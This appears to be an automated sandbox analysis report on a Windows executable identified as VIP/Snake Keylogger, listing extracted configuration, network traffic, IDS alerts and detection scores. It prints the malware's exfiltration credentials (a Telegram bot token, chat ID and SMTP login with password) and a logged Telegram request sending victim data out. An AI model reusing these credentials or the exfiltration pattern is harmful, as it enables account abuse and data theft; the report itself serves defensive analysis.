Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat id": "7319393351", "Email ID": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587"}
Source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "accounts@ruchiraprinting.com", "Password": "Ruchira@PR12", "Host": "mail.ruchiraprinting.com", "Port": "587", "Token": "7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk", "Chat_id": "7319393351", "Version": "4.4"}

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:29:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49697 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49694 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49696 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 104.21.96.1:443

Source: n8l3NmC5EH.exe	Virustotal: Detection: 75%			Perma Link
Source: n8l3NmC5EH.exe	ReversingLabs: Detection: 73%

Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: accounts@ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: Ruchira@PR12
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: mail.ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: stefano.clemente-memoryworld@wstceh.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 587
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7319393351
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor:
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: accounts@ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: Ruchira@PR12
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: mail.ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: stefano.clemente-memoryworld@wstceh.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 587
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7319393351
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor:
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: accounts@ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: Ruchira@PR12
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: mail.ruchiraprinting.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: stefano.clemente-memoryworld@wstceh.com
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 587
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor: 7319393351
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack	String decryptor:

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 0107F45Dh	3_2_0107F2C0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 0107F45Dh	3_2_0107F4AC
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 0107FC19h	3_2_0107F961
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A43308h	3_2_06A42EF0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A42D41h	3_2_06A42A90
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A43308h	3_2_06A42EEB
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4D919h	3_2_06A4D670
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4EA79h	3_2_06A4E7D0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4E1C9h	3_2_06A4DF20
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4F781h	3_2_06A4F4D8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4EED1h	3_2_06A4EC28
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4D069h	3_2_06A4CDC0
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4DD71h	3_2_06A4DAC8
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A43308h	3_2_06A43236
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4D4C1h	3_2_06A4D218
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A40D0Dh	3_2_06A40B30
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A416F8h	3_2_06A40B30
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4E621h	3_2_06A4E378
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4F329h	3_2_06A4F080
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06A40040
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 4x nop then jmp 06A4FBD9h	3_2_06A4F930

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report n8l3NmC5EH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
n8l3NmC5EH.exe